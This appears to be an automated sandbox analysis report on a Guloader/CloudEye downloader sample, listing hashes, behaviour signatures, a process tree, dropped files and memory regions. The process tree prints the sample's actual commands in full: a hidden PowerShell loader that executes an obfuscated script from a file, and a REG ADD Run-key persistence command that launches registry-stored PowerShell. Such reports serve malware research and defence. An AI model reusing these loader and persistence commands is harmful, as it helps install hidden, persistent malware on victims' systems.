Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 11:21

General

  • Target

    MalwareBazaar.exe

  • Size

    398KB

  • MD5

    b1c35e78f5d588430c4f534479def9f2

  • SHA1

    f787dd3327ca04361935f74867f76f16821db99f

  • SHA256

    4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7

  • SHA512

    5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c

  • SSDEEP

    12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
    "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2192
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1656

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag

    Filesize

    344KB

    MD5

    1a78d0f226d0db154812e61b8cadb4b8

    SHA1

    e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e

    SHA256

    19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e

    SHA512

    b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

    Filesize

    68KB

    MD5

    d89dac6d6bcfb431c31bdf7d21f48fbd

    SHA1

    2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9

    SHA256

    ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b

    SHA512

    76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

  • memory/2192-18-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-14-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-15-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-12-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-11-0x0000000073CB1000-0x0000000073CB2000-memory.dmp

    Filesize

    4KB

  • memory/2192-13-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-20-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2192-21-0x0000000006660000-0x00000000091FE000-memory.dmp

    Filesize

    43.6MB

  • memory/2192-22-0x0000000073CB0000-0x000000007425B000-memory.dmp

    Filesize

    5.7MB

  • memory/2832-39-0x0000000000AE0000-0x0000000001B42000-memory.dmp

    Filesize

    16.4MB

  • memory/2832-46-0x0000000001B50000-0x00000000046EE000-memory.dmp

    Filesize

    43.6MB